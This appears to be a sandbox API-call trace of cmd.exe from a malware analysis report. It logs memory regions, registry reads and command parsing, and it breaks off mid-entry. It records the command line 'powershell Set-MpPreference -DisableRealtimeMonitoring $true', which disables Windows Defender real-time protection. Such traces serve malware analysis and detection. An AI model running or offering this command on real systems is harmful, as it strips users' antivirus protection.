0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1574 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1575 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1583 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1584 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1585 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1586 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1587 start_va = 0x7b0000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1588 start_va = 0x940000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1589 start_va = 0x1d40000 end_va = 0x2082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 1625 start_va = 0x2090000 end_va = 0x235efff entry_point = 0x2090000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 110 os_tid = 0x8fc [0105.835] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd6c | out: lpSystemTimeAsFileTime=0x1efd6c*(dwLowDateTime=0xe3499550, dwHighDateTime=0x1d4be3a)) [0105.835] GetCurrentProcessId () returned 0x900 [0105.835] GetCurrentThreadId () returned 0x8fc [0105.835] GetTickCount () returned 0x27c6f [0105.835] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd64 | out: lpPerformanceCount=0x1efd64*=1818320700000) returned 1 [0105.836] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0105.836] __set_app_type (_Type=0x1) [0105.836] __p__fmode () returned 0x75ca31f4 [0105.837] __p__commode () returned 0x75ca31fc [0105.837] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0105.837] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0105.837] GetCurrentThreadId () returned 0x8fc [0105.837] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x60 [0105.837] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.837] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0105.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.838] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efcfc | out: phkResult=0x1efcfc*=0x0) returned 0x2 [0105.838] VirtualQuery (in: lpAddress=0x1efd33, lpBuffer=0x1efccc, dwLength=0x1c | out: lpBuffer=0x1efccc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efccc, dwLength=0x1c | out: lpBuffer=0x1efccc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efccc, dwLength=0x1c | out: lpBuffer=0x1efccc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efccc, dwLength=0x1c | out: lpBuffer=0x1efccc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efccc, dwLength=0x1c | out: lpBuffer=0x1efccc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0105.838] GetConsoleOutputCP () returned 0x1b5 [0105.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.839] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0105.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0105.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0105.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.840] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.840] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.840] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0105.854] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.854] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0105.856] GetEnvironmentStringsW () returned 0x3a23f0* [0105.857] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0105.857] GetEnvironmentStringsW () returned 0x3a23f0* [0105.857] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0105.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec6c | out: phkResult=0x1eec6c*=0x68) returned 0x0 [0105.857] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x0, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.857] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x1, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.857] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x1, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.857] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x0, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x40, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x40, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x40, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.858] RegCloseKey (hKey=0x68) returned 0x0 [0105.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec6c | out: phkResult=0x1eec6c*=0x68) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x40, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x1, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x1, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x0, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x9, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x4, lpData=0x1eec78*=0x9, lpcbData=0x1eec70*=0x4) returned 0x0 [0105.858] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec74, lpData=0x1eec78, lpcbData=0x1eec70*=0x1000 | out: lpType=0x1eec74*=0x0, lpData=0x1eec78*=0x9, lpcbData=0x1eec70*=0x1000) returned 0x2 [0105.858] RegCloseKey (hKey=0x68) returned 0x0 [0105.858] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e5b [0105.858] srand (_Seed=0x5c5b0e5b) [0105.858] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0105.858] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0105.859] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a47e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0105.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.862] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.862] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.862] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0105.862] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0105.862] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0105.862] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0105.862] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0105.862] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0105.862] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0105.862] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0105.862] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0105.862] GetEnvironmentStringsW () returned 0x3a23f0* [0105.862] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0105.862] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.862] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.862] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0105.862] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0105.862] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0105.862] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0105.862] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0105.862] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0105.862] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0105.862] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0105.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efa38 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1efa38, lpFilePart=0x1efa34 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1efa34*="system32") returned 0x13 [0105.863] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.863] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1ef7b4 | out: lpFindFileData=0x1ef7b4) returned 0x3907f0 [0105.863] FindClose (in: hFindFile=0x3907f0 | out: hFindFile=0x3907f0) returned 1 [0105.863] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1ef7b4 | out: lpFindFileData=0x1ef7b4) returned 0x3907f0 [0105.863] FindClose (in: hFindFile=0x3907f0 | out: hFindFile=0x3907f0) returned 1 [0105.863] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.863] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0105.863] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0105.863] GetEnvironmentStringsW () returned 0x3a23f0* [0105.863] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0105.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.864] GetConsoleOutputCP () returned 0x1b5 [0105.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.864] GetUserDefaultLCID () returned 0x409 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb78, cchData=128 | out: lpLCData="0") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb78, cchData=128 | out: lpLCData="0") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb78, cchData=128 | out: lpLCData="1") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0105.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0105.866] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.867] GetConsoleTitleW (in: lpConsoleTitle=0x3910c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.868] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0105.868] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0105.868] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0105.926] _wcsicmp (_String1="powershell", _String2=")") returned 71 [0105.926] _wcsicmp (_String1="FOR", _String2="powershell") returned -10 [0105.926] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10 [0105.926] _wcsicmp (_String1="IF", _String2="powershell") returned -7 [0105.926] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7 [0105.926] _wcsicmp (_String1="REM", _String2="powershell") returned 2 [0105.926] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2 [0105.927] GetConsoleTitleW (in: lpConsoleTitle=0x1ef870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.928] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0105.928] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0105.928] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0105.928] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0105.928] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0105.928] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0105.928] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0105.928] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0105.928] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0105.928] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0105.928] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0105.928] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0105.928] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0105.928] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0105.928] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0105.928] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0105.928] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0105.928] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0105.928] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0105.928] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0105.928] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0105.928] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0105.928] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0105.928] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0105.928] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0105.928] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0105.928] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0105.928] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0105.928] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0105.928] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0105.928] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0105.928] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0105.928] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0105.928] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0105.928] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0105.928] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0105.928] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0105.929] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0105.929] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0105.929] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0105.929] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0105.929] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0105.929] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0105.929] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0105.929] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0105.929] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0105.929] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0105.929] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0105.929] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0105.929] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0105.929] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0105.929] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0105.929] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0105.929] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0105.929] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0105.929] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0105.929] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0105.929] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0105.929] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0105.929] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0105.929] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0105.929] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0105.929] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0105.929] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0105.929] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0105.929] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0105.929] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0105.929] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0105.929] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0105.929] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0105.929] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0105.929] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0105.929] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0105.929] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0105.929] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0105.930] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0105.930] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0105.930] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0105.930] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0105.930] _wcsicmp (_String1="powershell", _String2="FOR") returned 10 [0105.930] _wcsicmp (_String1="powershell", _String2="IF") returned 7 [0105.930] _wcsicmp (_String1="powershell", _String2="REM") returned -2 [0105.930] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13 [0105.931] SetErrorMode (uMode=0x0) returned 0x0 [0105.931] SetErrorMode (uMode=0x1) returned 0x0 [0105.931] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a58e0, lpFilePart=0x1ef390 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef390*="system32") returned 0x13 [0105.931] SetErrorMode (uMode=0x0) returned 0x1 [0105.931] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.931] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.937] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.938] GetLastError () returned 0x2 [0105.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.938] GetLastError () returned 0x2 [0105.938] FindFirstFileExW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.938] GetLastError () returned 0x3 [0105.938] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.938] GetLastError () returned 0x2 [0105.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.938] GetLastError () returned 0x2 [0105.938] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.939] GetLastError () returned 0x2 [0105.939] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.939] GetLastError () returned 0x2 [0105.939] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.939] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, 